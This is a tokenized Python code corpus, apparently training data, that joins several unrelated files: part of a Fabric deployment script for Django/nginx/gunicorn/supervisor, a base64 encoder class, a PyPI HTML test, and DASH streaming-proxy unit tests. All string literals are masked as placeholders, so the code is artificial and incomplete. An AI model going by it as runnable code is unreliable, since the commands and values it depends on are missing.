'<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . repository ) ) <EOL> if '<STR_LIT>' not in env or not env . hosts : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . hosts ) ) <EOL> if '<STR_LIT>' not in env or not env . django_user : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_user ) ) <EOL> if '<STR_LIT>' not in env or not env . django_user_group : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_user_group ) ) <EOL> if '<STR_LIT>' not in env or not env . django_user_home : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_user_home ) ) <EOL> if '<STR_LIT>' not in env or not env . projects_path : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . 
projects_path ) ) <EOL> if '<STR_LIT>' not in env or not env . code_root : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . code_root ) ) <EOL> if '<STR_LIT>' not in env or not env . django_project_root : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_project_root ) ) <EOL> if '<STR_LIT>' not in env or not env . django_project_settings : <EOL> env . django_project_settings = '<STR_LIT>' <EOL> if verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_project_settings ) ) <EOL> if '<STR_LIT>' not in env or not env . django_media_path : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_media_path ) ) <EOL> if '<STR_LIT>' not in env or not env . django_static_path : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_static_path ) ) <EOL> if '<STR_LIT>' not in env : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . south_used ) ) <EOL> if '<STR_LIT>' not in env or not env . virtenv : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . virtenv ) ) <EOL> if '<STR_LIT>' not in env or not env . virtenv_options : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . virtenv_options ) ) <EOL> if '<STR_LIT>' not in env or not env . requirements_file : <EOL> env . requirements_file = join ( env . code_root , '<STR_LIT>' ) <EOL> if verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . requirements_file ) ) <EOL> if '<STR_LIT>' not in env : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . 
ask_confirmation ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_bind : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_bind ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_logfile : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_logfile ) ) <EOL> if '<STR_LIT>' not in env or not env . rungunicorn_script : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . rungunicorn_script ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_workers : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_workers ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_worker_class : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_worker_class ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_loglevel : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_loglevel ) ) <EOL> if '<STR_LIT>' not in env or not env . nginx_server_name : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_server_name ) ) <EOL> if '<STR_LIT>' not in env or not env . nginx_conf_file : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_conf_file ) ) <EOL> if '<STR_LIT>' not in env or not env . nginx_client_max_body_size : <EOL> env . nginx_client_max_body_size = <NUM_LIT:10> <EOL> elif not isinstance ( env . nginx_client_max_body_size , int ) : <EOL> errors . append ( '<STR_LIT>' ) <EOL> if verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . 
nginx_client_max_body_size ) ) <EOL> if '<STR_LIT>' not in env or not env . nginx_htdocs : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_htdocs ) ) <EOL> if '<STR_LIT>' not in env : <EOL> env . nginx_https = False <EOL> elif not isinstance ( env . nginx_https , bool ) : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_https ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_program_name : <EOL> env . supervisor_program_name = env . project <EOL> if verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_program_name ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisorctl : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisorctl ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_autostart : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_autostart ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_autorestart : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_autorestart ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_redirect_stderr : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_redirect_stderr ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_stdout_logfile : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_stdout_logfile ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisord_conf_file : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . 
supervisord_conf_file ) ) <EOL> if errors : <EOL> if len ( errors ) == <NUM_LIT> : <EOL> '''<STR_LIT>''' <EOL> puts ( '<STR_LIT>' ) <EOL> else : <EOL> puts ( '<STR_LIT>' % len ( errors ) ) <EOL> puts ( '<STR_LIT>' % ( '<STR_LIT:->' * <NUM_LIT> , '<STR_LIT>' . join ( errors ) ) ) <EOL> puts ( '<STR_LIT:->' * <NUM_LIT> ) <EOL> puts ( '<STR_LIT>' ) <EOL> return False <EOL> elif verbose : <EOL> for parameter in parameters_info : <EOL> parameter_formatting = "<STR_LIT>" if isinstance ( parameter [ <NUM_LIT:1> ] , str ) else "<STR_LIT:%s>" <EOL> parameter_value = parameter_formatting % parameter [ <NUM_LIT:1> ] <EOL> puts ( '<STR_LIT>' % ( parameter [ <NUM_LIT:0> ] . ljust ( <NUM_LIT> ) , green ( parameter_value ) ) ) <EOL> puts ( '<STR_LIT>' ) <EOL> return True <EOL> def _create_django_user ( ) : <EOL> with settings ( hide ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , warn_only = True ) : <EOL> res = sudo ( '<STR_LIT>' % env ) <EOL> if '<STR_LIT>' in res : <EOL> puts ( '<STR_LIT>' % env ) <EOL> return <EOL> sudo ( '<STR_LIT>' % env ) <EOL> def _verify_sudo ( ) : <EOL> '''<STR_LIT>''' <EOL> sudo ( '<STR_LIT>' ) <EOL> def _install_nginx ( ) : <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" ) <EOL> def _install_dependencies ( ) : <EOL> '''<STR_LIT>''' <EOL> packages = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( packages ) ) <EOL> if "<STR_LIT>" in env and env . additional_packages : <EOL> sudo ( "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( env . additional_packages ) ) <EOL> _install_nginx ( ) <EOL> sudo ( "<STR_LIT>" ) <EOL> def _install_requirements ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in env and env . requirements_file : <EOL> virtenvsudo ( '<STR_LIT>' % env . 
requirements_file ) <EOL> def _install_gunicorn ( ) : <EOL> """<STR_LIT>""" <EOL> virtenvsudo ( '<STR_LIT>' ) <EOL> def _install_virtualenv ( ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> def _create_virtualenv ( ) : <EOL> sudo ( '<STR_LIT>' % ( '<STR_LIT>' . join ( env . virtenv_options ) , env . virtenv ) ) <EOL> def _setup_directories ( ) : <EOL> sudo ( '<STR_LIT>' % env ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . gunicorn_logfile ) ) <EOL> sudo ( '<STR_LIT>' % ( env . django_user , dirname ( env . gunicorn_logfile ) ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . gunicorn_logfile ) ) <EOL> sudo ( '<STR_LIT>' % env . gunicorn_logfile ) <EOL> sudo ( '<STR_LIT>' % ( env . django_user , env . gunicorn_logfile ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . supervisor_stdout_logfile ) ) <EOL> sudo ( '<STR_LIT>' % ( env . django_user , dirname ( env . supervisor_stdout_logfile ) ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . supervisor_stdout_logfile ) ) <EOL> sudo ( '<STR_LIT>' % env . supervisor_stdout_logfile ) <EOL> sudo ( '<STR_LIT>' % ( env . django_user , env . supervisor_stdout_logfile ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . nginx_conf_file ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . supervisord_conf_file ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . rungunicorn_script ) ) <EOL> sudo ( '<STR_LIT>' % env ) <EOL> sudo ( '<STR_LIT>' % env ) <EOL> sudo ( '<STR_LIT>' % env ) <EOL> def virtenvrun ( command ) : <EOL> activate = '<STR_LIT>' % env . virtenv <EOL> run ( activate + '<STR_LIT>' + command ) <EOL> def virtenvsudo ( command ) : <EOL> activate = '<STR_LIT>' % env . virtenv <EOL> sudo ( activate + '<STR_LIT>' + command ) <EOL> def _hg_clone ( ) : <EOL> sudo ( '<STR_LIT>' % ( env . repository , env . 
code_root ) ) <EOL> def _test_nginx_conf ( ) : <EOL> with settings ( hide ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , warn_only = True ) : <EOL> res = sudo ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in res : <EOL> abort ( red_bg ( '<STR_LIT>' ) ) <EOL> def _upload_nginx_conf ( ) : <EOL> '''<STR_LIT>''' <EOL> local_nginx_conf_file_name = '<STR_LIT>' <EOL> if env . nginx_https : <EOL> local_nginx_conf_file_name = '<STR_LIT>' <EOL> local_nginx_conf_file_path = "<STR_LIT>" % ( dirname ( env . real_fabfile ) , local_nginx_conf_file_name ) <EOL> if isfile ( local_nginx_conf_file_path ) : <EOL> '''<STR_LIT>''' <EOL> template = local_nginx_conf_file_path <EOL> else : <EOL> template = '<STR_LIT>' % ( fagungis_path , local_nginx_conf_file_name ) <EOL> context = copy ( env ) <EOL> upload_template ( template , env . nginx_conf_file , <EOL> context = context , backup = False , use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % ( env . nginx_conf_file , basename ( env . nginx_conf_file ) ) ) <EOL> _test_nginx_conf ( ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def _reload_supervisorctl ( ) : <EOL> sudo ( '<STR_LIT>' % env ) <EOL> sudo ( '<STR_LIT>' % env ) <EOL> def _upload_supervisord_conf ( ) : <EOL> '''<STR_LIT>''' <EOL> local_supervisord_conf_file_path = "<STR_LIT>" % dirname ( env . real_fabfile ) <EOL> if isfile ( local_supervisord_conf_file_path ) : <EOL> '''<STR_LIT>''' <EOL> template = local_supervisord_conf_file_path <EOL> else : <EOL> template = '<STR_LIT>' % fagungis_path <EOL> upload_template ( template , env . supervisord_conf_file , <EOL> context = env , backup = False , use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % ( env . supervisord_conf_file , basename ( env . supervisord_conf_file ) ) ) <EOL> _reload_supervisorctl ( ) <EOL> def _prepare_django_project ( ) : <EOL> with cd ( env . django_project_root ) : <EOL> virtenvrun ( '<STR_LIT>' ) <EOL> if env . 
south_used : <EOL> virtenvrun ( '<STR_LIT>' ) <EOL> virtenvsudo ( '<STR_LIT>' ) <EOL> def _prepare_media_path ( ) : <EOL> path = env . django_media_path . rstrip ( '<STR_LIT:/>' ) <EOL> sudo ( '<STR_LIT>' % path ) <EOL> sudo ( '<STR_LIT>' % path ) <EOL> def _upload_rungunicorn_script ( ) : <EOL> '''<STR_LIT>''' <EOL> if isfile ( '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> template = '<STR_LIT>' <EOL> else : <EOL> template = '<STR_LIT>' % fagungis_path <EOL> upload_template ( template , env . rungunicorn_script , <EOL> context = env , backup = False , use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % env . rungunicorn_script ) <EOL> def _supervisor_restart ( ) : <EOL> with settings ( hide ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , warn_only = True ) : <EOL> res = sudo ( '<STR_LIT>' % env ) <EOL> if '<STR_LIT>' in res : <EOL> print red_bg ( "<STR_LIT>" % env . supervisor_program_name ) <EOL> else : <EOL> print green_bg ( "<STR_LIT>" % env . supervisor_program_name ) </s>
<s> from sneakers . modules import Encoder <EOL> import base64 <EOL> class B64 ( Encoder ) : <EOL> description = """<STR_LIT>""" <EOL> def encode ( self , data ) : <EOL> params = self . params [ '<STR_LIT>' ] <EOL> return base64 . b64encode ( data ) <EOL> def decode ( self , data ) : <EOL> params = self . params [ '<STR_LIT>' ] <EOL> return base64 . urlsafe_b64decode ( str ( data ) ) </s>
<s> from __future__ import print_function , division , absolute_import <EOL> import unittest <EOL> import os <EOL> import sys <EOL> from . . pypi import _extract_html <EOL> from . . unpack import unpack_html <EOL> class ExtractHtmlTest ( unittest . TestCase ) : <EOL> def test_extract_html ( self ) : <EOL> path = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) <EOL> with open ( path ) as f : <EOL> names = _extract_html ( f . read ( ) ) <EOL> self . assertListEqual ( names , '<STR_LIT>' . split ( ) ) <EOL> class UnpackHtmlTest ( unittest . TestCase ) : <EOL> @ unittest . skipIf ( sys . version_info [ <NUM_LIT:0> ] != <NUM_LIT:3> , '<STR_LIT>' ) <EOL> def test_py3_unpack_html ( self ) : <EOL> data = bytes ( '<STR_LIT>' , '<STR_LIT:utf-8>' ) <EOL> self . assertEqual ( unpack_html ( data ) , data . decode ( '<STR_LIT:utf-8>' ) ) <EOL> @ unittest . skipIf ( sys . version_info [ <NUM_LIT:0> ] != <NUM_LIT:2> , '<STR_LIT>' ) <EOL> def test_py2_unpack_html ( self ) : <EOL> data = '<STR_LIT:abc>' <EOL> self . assertEqual ( unpack_html ( data ) , data . decode ( '<STR_LIT:utf-8>' ) ) </s>
<s> SERVER_VERSION = "<STR_LIT>" <EOL> SERVER_AGENT = "<STR_LIT>" % SERVER_VERSION </s>
<s> import unittest , sys <EOL> from dash_test_util import * <EOL> from dashlivesim . dashlib import dash_proxy <EOL> from dashlivesim . dashlib import mpdprocessor <EOL> class TestMPDProcessing ( unittest . TestCase ) : <EOL> "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . oldBaseUrlState = mpdprocessor . SET_BASEURL <EOL> mpdprocessor . SET_BASEURL = False <EOL> def tearDown ( self ) : <EOL> mpdprocessor . SET_BASEURL = self . oldBaseUrlState <EOL> def testMPDhandling ( self ) : <EOL> mpdprocessor . SET_BASEURL = True <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertTrue ( d . find ( "<STR_LIT>" ) > <NUM_LIT:0> ) <EOL> def testMPDwithChangedAST ( self ) : <EOL> "<STR_LIT>" <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) < <NUM_LIT:0> ) <EOL> def testMPDwithStartandDur ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> if dash_proxy . PUBLISH_TIME : <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . 
find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> def testMPDwithStartand2Durations ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> if dash_proxy . PUBLISH_TIME : <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> if dash_proxy . PUBLISH_TIME : <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> def testHttpsBaseURL ( self ) : <EOL> "<STR_LIT>" <EOL> mpdprocessor . SET_BASEURL = True <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> is_https = <NUM_LIT:1> <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> , <EOL> is_https = is_https ) <EOL> d = dp . handle_request ( ) <EOL> self . assertTrue ( d . find ( "<STR_LIT>" ) > <NUM_LIT:0> ) <EOL> class TestInitSegmentProcessing ( unittest . TestCase ) : <EOL> def testInit ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( len ( d ) , <NUM_LIT> ) <EOL> class TestMediaSegments ( unittest . 
TestCase ) : <EOL> def testMediaSegmentForTfdt32 ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> self . assertEqual ( len ( d ) , <NUM_LIT> ) <EOL> def testMediaSegmentTooEarly ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d [ '<STR_LIT>' ] , False ) <EOL> def testMediaSegmentTooEarlyWithAST ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:10> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d [ '<STR_LIT>' ] , False ) <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( len ( d ) , <NUM_LIT> ) <EOL> def testMediaSegmentBeforeTimeShiftBufferDepth ( self ) : <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" % ( ( now - <NUM_LIT> ) / <NUM_LIT:6> ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> self . 
assertEqual ( d [ '<STR_LIT>' ] , False ) <EOL> def testLastMediaSegment ( self ) : <EOL> "<STR_LIT>" <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d . find ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> def testMultiPeriod ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> periodPositions = findAllIndexes ( "<STR_LIT>" , d ) <EOL> self . assertEqual ( len ( periodPositions ) , <NUM_LIT:2> ) <EOL> def testContinuous ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT> ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> periodPositions = findAllIndexes ( "<STR_LIT>" , d ) <EOL> self . assertGreater ( len ( periodPositions ) , <NUM_LIT:1> ) <EOL> def testUtcTiming ( self ) : <EOL> "<STR_LIT>" <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> head_pos = d . find ( '<STR_LIT>' ) <EOL> direct_pos = d . find ( '<STR_LIT>' ) <EOL> self . assertLess ( direct_pos , head_pos ) <EOL> class TestMorePathLevels ( unittest . 
TestCase ) : <EOL> "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . oldBaseUrlState = mpdprocessor . SET_BASEURL <EOL> mpdprocessor . SET_BASEURL = False <EOL> def tearDown ( self ) : <EOL> mpdprocessor . SET_BASEURL = self . oldBaseUrlState <EOL> def testMPDGet ( self ) : <EOL> mpdprocessor . SET_BASEURL = True <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertGreater ( d . find ( "<STR_LIT>" ) , <NUM_LIT:0> ) <EOL> def testInit ( self ) : <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = <NUM_LIT:0> ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( len ( d ) , <NUM_LIT> ) <EOL> def testMediaSegment ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" % ( ( now - <NUM_LIT> ) / <NUM_LIT:6> ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> class TestTfdt ( unittest . TestCase ) : <EOL> "<STR_LIT>" <EOL> def testMediaSegment ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" % ( ( now - <NUM_LIT> ) / <NUM_LIT:6> ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . 
handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> def testTfdtValueFromZero ( self ) : <EOL> "<STR_LIT>" <EOL> now = <NUM_LIT> <EOL> segNr = <NUM_LIT> <EOL> segment = "<STR_LIT>" % segNr <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> tfdtValue = dp . new_tfdt_value <EOL> presentationTime = tfdtValue / <NUM_LIT> <EOL> segmentTime = segNr * <NUM_LIT:6> <EOL> self . assertEqual ( presentationTime , segmentTime ) <EOL> def testThatNoPresentationTimeOffsetForTfdt32 ( self ) : <EOL> now = <NUM_LIT> <EOL> segNr = <NUM_LIT> <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> self . assertFalse ( d . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> class TestInitMux ( unittest . TestCase ) : <EOL> def testInitMux ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ] 